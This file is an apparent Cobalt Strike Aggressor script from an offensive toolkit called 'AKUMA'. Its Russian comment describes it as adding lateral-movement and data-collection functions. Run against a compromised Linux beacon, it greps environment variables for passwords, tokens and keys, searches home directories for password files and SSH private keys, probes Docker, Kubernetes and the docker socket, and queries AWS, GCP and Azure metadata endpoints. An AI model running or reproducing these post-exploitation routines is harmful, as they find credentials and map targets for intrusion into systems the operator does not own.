# AKUMA's Linux Extended Functions
# Дополнительные функции для lateral movement и data collection

# ========== EXTENDED FUNCTIONS ==========

sub akuma_advanced_enum {
    local('$bid');
    $bid = $1;
    
    blog($bid, "AKUMA Advanced Enumeration Starting...");
    
    bshell($bid, "echo '=== AKUMA ADVANCED ENUMERATION ==='");
    bshell($bid, "echo '=== ENVIRONMENT VARIABLES ==='");
    bshell($bid, "env | grep -i 'pass\\|secret\\|key\\|token' 2>/dev/null");
    
    bshell($bid, "echo '=== INTERESTING FILES ==='");
    bshell($bid, "find /home -type f -name '*.txt' 2>/dev/null | xargs grep -l -i 'password' 2>/dev/null | head -5");
    bshell($bid, "find /home -type f -name 'id_*' 2>/dev/null | head -5");
    
    bshell($bid, "echo '=== NETWORK SERVICES ==='");
    bshell($bid, "ss -tlnp 2>/dev/null | grep LISTEN | head -10");
    
    blog($bid, "AKUMA Advanced Enumeration Complete!");
}

sub akuma_container_check {
    local('$bid');
    $bid = $1;
    
    blog($bid, "AKUMA Container Check Starting...");
    
    bshell($bid, "echo '=== CONTAINER DETECTION ==='");
    bshell($bid, "cat /.dockerenv 2>/dev/null && echo 'Running inside Docker container'");
    bshell($bid, "cat /proc/1/cgroup | grep -i docker && echo 'Docker detected in cgroups'");
    bshell($bid, "cat /proc/1/cgroup | grep -i kube && echo 'Kubernetes detected'");
    
    bshell($bid, "echo '=== DOCKER INFORMATION ==='");
    bshell($bid, "docker ps 2>/dev/null | head -10");
    bshell($bid, "docker images 2>/dev/null | head -10");
    bshell($bid, "ls -la /var/run/docker.sock 2>/dev/null");
    
    blog($bid, "AKUMA Container Check Complete!");
}

sub akuma_cloud_check {
    local('$bid');
    $bid = $1;
    
    blog($bid, "AKUMA Cloud Check Starting...");
    
    bshell($bid, "echo '=== CLOUD ENVIRONMENT DETECTION ==='");
    bshell($bid, "timeout 3 curl -s http://169.254.169.254/latest/meta-data/instance-id 2>/dev/null && echo 'AWS instance detected'");
    bshell($bid, "timeout 3 curl -s -H 'Metadata-Flavor: Google' http://169.254.169.254/computeMetadata/v1/instance/name 2>/dev/null && echo 'GCP instance detected'");
    bshell($bid, "timeout 3 curl -s -H 'Metadata: true' http://169.254.169.254/metadata/instance/compute/vmId?api-version=2021-02-01 2>/dev/null && echo 'Azure instance detected'");
    
    bshell($bid, "echo '=== CLOUD-INIT ==='");
    bshell($bid, "ls -la /var/lib/cloud/ 2>/dev/null");
    
    blog($bid, "AKUMA Cloud Check Complete!");
}

blog("AKUMA Linux Extended Functions Loaded!");
